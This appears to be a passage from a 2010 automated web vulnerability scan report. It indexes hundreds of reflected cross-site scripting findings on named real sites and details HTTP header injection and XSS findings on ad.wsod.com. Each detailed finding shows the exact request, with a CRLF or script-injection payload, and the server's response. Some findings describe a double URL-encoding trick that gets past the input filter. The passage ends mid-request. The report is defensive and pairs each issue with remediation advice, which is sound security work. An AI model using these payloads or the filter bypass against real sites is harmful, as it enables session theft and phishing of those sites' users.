2.484. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.485. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.486. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.487. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.488. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.489. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.490. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.491. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.492. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.493. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.494. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.495. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.496. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.497. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.498. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.499. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.500. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.501. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.502. https://www.linkedin.com/secure/login [REST URL parameter 1]

2.503. http://www.move.com/trends/ [name of an arbitrarily supplied request parameter]

2.504. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [REST URL parameter 2]

2.505. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [name of an arbitrarily supplied request parameter]

2.506. http://www.move.com/trends/charity-gifts-for-christmas/ [REST URL parameter 2]

2.507. http://www.move.com/trends/charity-gifts-for-christmas/ [name of an arbitrarily supplied request parameter]

2.508. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [REST URL parameter 2]

2.509. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [name of an arbitrarily supplied request parameter]

2.510. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [REST URL parameter 2]

2.511. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [name of an arbitrarily supplied request parameter]

2.512. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [REST URL parameter 2]

2.513. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [name of an arbitrarily supplied request parameter]

2.514. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.515. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.516. http://www.nahb.org/news.aspx [name of an arbitrarily supplied request parameter]

2.517. http://www.nahb.org/page.aspx/landing/sectionID=85 [name of an arbitrarily supplied request parameter]

2.518. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 1]

2.519. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 2]

2.520. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 3]

2.521. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 4]

2.522. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [name of an arbitrarily supplied request parameter]

2.523. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 1]

2.524. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 2]

2.525. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 3]

2.526. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 4]

2.527. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [name of an arbitrarily supplied request parameter]

2.528. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 1]

2.529. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 2]

2.530. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 3]

2.531. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 4]

2.532. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [name of an arbitrarily supplied request parameter]

2.533. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 1]

2.534. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 2]

2.535. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 3]

2.536. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 4]

2.537. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [name of an arbitrarily supplied request parameter]

2.538. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 1]

2.539. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 2]

2.540. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 3]

2.541. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 4]

2.542. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [name of an arbitrarily supplied request parameter]

2.543. http://www.themtn.tv/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.html [REST URL parameter 5]

2.544. http://www.themtn.tv/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html [REST URL parameter 5]

2.545. http://www.themtn.tv/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html [REST URL parameter 5]

2.546. http://www.themtn.tv/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.html [REST URL parameter 5]

2.547. http://www.themtn.tv/06/01/10/Around-the-Mountain---Air-Force-Football/landing.html [REST URL parameter 5]

2.548. http://www.themtn.tv/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.html [REST URL parameter 5]

2.549. http://www.themtn.tv/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html [REST URL parameter 5]

2.550. http://www.themtn.tv/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.html [REST URL parameter 5]

2.551. http://www.themtn.tv/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html [REST URL parameter 5]

2.552. http://www.themtn.tv/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html [REST URL parameter 5]

2.553. http://www.themtn.tv/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html [REST URL parameter 5]

2.554. http://www.themtn.tv/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.html [REST URL parameter 5]

2.555. http://www.themtn.tv/09/08/10/Excellent-Source-for-Breaking-News/landing.html [REST URL parameter 5]

2.556. http://www.themtn.tv/09/14/10/Quality-Original-Programming/landing.html [REST URL parameter 5]

2.557. http://www.themtn.tv/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html [REST URL parameter 5]

2.558. http://www.themtn.tv/09/23/10/An-Impressed-Viewer/landing.html [REST URL parameter 5]

2.559. http://www.themtn.tv/10/13/10/ALL-22-Is-Alright/landing.html [REST URL parameter 5]

2.560. http://www.themtn.tv/10/27/10/Mountain-West-Football-Saturday-Comments/landing.html [REST URL parameter 5]

2.561. http://www.themtn.tv/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html [REST URL parameter 5]

2.562. http://www.themtn.tv/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.html [REST URL parameter 5]

2.563. http://www.themtn.tv/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.html [REST URL parameter 5]

2.564. http://www.themtn.tv/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html [REST URL parameter 5]

2.565. http://www.themtn.tv/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html [REST URL parameter 5]

2.566. http://www.themtn.tv/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html [REST URL parameter 5]

2.567. http://www.themtn.tv/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html [REST URL parameter 5]

2.568. http://www.themtn.tv/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.html [REST URL parameter 5]

2.569. http://www.themtn.tv/11/29/10/TCU-Accepts-Big-East-Invite/landing.html [REST URL parameter 5]

2.570. http://www.themtn.tv/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html [REST URL parameter 5]

2.571. http://www.themtn.tv/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.html [REST URL parameter 5]

2.572. http://www.themtn.tv/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.html [REST URL parameter 5]

2.573. http://www.themtn.tv/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.html [REST URL parameter 5]

2.574. http://www.themtn.tv/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html [REST URL parameter 5]

2.575. http://www.themtn.tv/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html [REST URL parameter 5]

2.576. http://www.themtn.tv/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html [REST URL parameter 5]

2.577. http://www.themtn.tv/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html [REST URL parameter 5]

2.578. http://www.themtn.tv/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html [REST URL parameter 5]

2.579. http://www.themtn.tv/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html [REST URL parameter 5]

2.580. http://www.themtn.tv/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html [REST URL parameter 5]

2.581. http://www.themtn.tv/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html [REST URL parameter 5]

2.582. http://www.themtn.tv/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html [REST URL parameter 5]

2.583. http://www.themtn.tv/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.html [REST URL parameter 5]

2.584. http://www.themtn.tv/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html [REST URL parameter 5]

2.585. http://www.themtn.tv/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html [REST URL parameter 5]

2.586. http://www.themtn.tv/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.html [REST URL parameter 5]

2.587. http://www.themtn.tv/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html [REST URL parameter 5]

2.588. http://www.themtn.tv/common/ad_count.php [REST URL parameter 1]

2.589. http://www.themtn.tv/common/ad_count.php [REST URL parameter 2]

2.590. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 1]

2.591. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 2]

2.592. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 3]

2.593. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 1]

2.594. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 2]

2.595. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 3]

2.596. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 4]

2.597. http://www.themtn.tv/common/js/aggregate.js [REST URL parameter 3]

2.598. http://www.themtn.tv/favicon.ico [REST URL parameter 1]

2.599. http://www.themtn.tv/pages/main [REST URL parameter 1]

2.600. http://www.themtn.tv/pages/main [REST URL parameter 2]

2.601. http://www.themtn.tv/pages/main [name of an arbitrarily supplied request parameter]

2.602. http://www.tumri.net/ads/mts/6274 [name of an arbitrarily supplied request parameter]

2.603. http://www.tvoneonline.com/gettvone.asp [name of an arbitrarily supplied request parameter]

2.604. http://www.tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.605. http://www.tweetology.com/images/button-login.png [REST URL parameter 1]

2.606. http://www.tweetology.com/images/button-login.png [REST URL parameter 2]

2.607. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 1]

2.608. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 2]

2.609. http://www5.nohold.net/Comcast/Loginr.aspx [name of an arbitrarily supplied request parameter]

2.610. http://www5.nohold.net/Comcast/login.aspx [name of an arbitrarily supplied request parameter]

2.611. http://jobsearch.comcast.monster.com/ [Referer HTTP header]

2.612. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.613. http://www.addthis.com/bookmark.php [Referer HTTP header]



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beacon/beacon1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2161b%0d%0ad9dd7e4e338 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2161b%0d%0ad9dd7e4e338/dclk.beacon/beacon1 HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2161b
d9dd7e4e338
/dclk.beacon/beacon1:
Date: Sun, 19 Dec 2010 18:33:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beaconreceived/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15e15%0d%0ad4200a93b03 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15e15%0d%0ad4200a93b03/dclk.beaconreceived/ HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15e15
d4200a93b03
/dclk.beaconreceived/:
Date: Sun, 19 Dec 2010 18:33:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)  previous
There are 613 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98 was submitted in the REST URL parameter 2. This input was echoed as d70c2"><script>alert(1)</script>edcf3732e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357d70c2"><script>alert(1)</script>edcf3732e98/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20 was submitted in the REST URL parameter 2. This input was echoed as b1f7a";alert(1)//e814149ac20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a";alert(1)//e814149ac20/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a was submitted in the REST URL parameter 3. This input was echoed as 351b5";alert(1)//463fb0d5a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30351b5";alert(1)//463fb0d5a8a/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442 was submitted in the REST URL parameter 3. This input was echoed as f7d5b"><script>alert(1)</script>e29654e3442 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee29654e3442/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30f7d5b"><script>alert(1)</script>e29654e3442/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781816**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af was submitted in the REST URL parameter 2. This input was echoed as f090d"><script>alert(1)</script>e24cabfa7af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357f090d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee24cabfa7af/561.0.iframe.120x30/1292781816** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
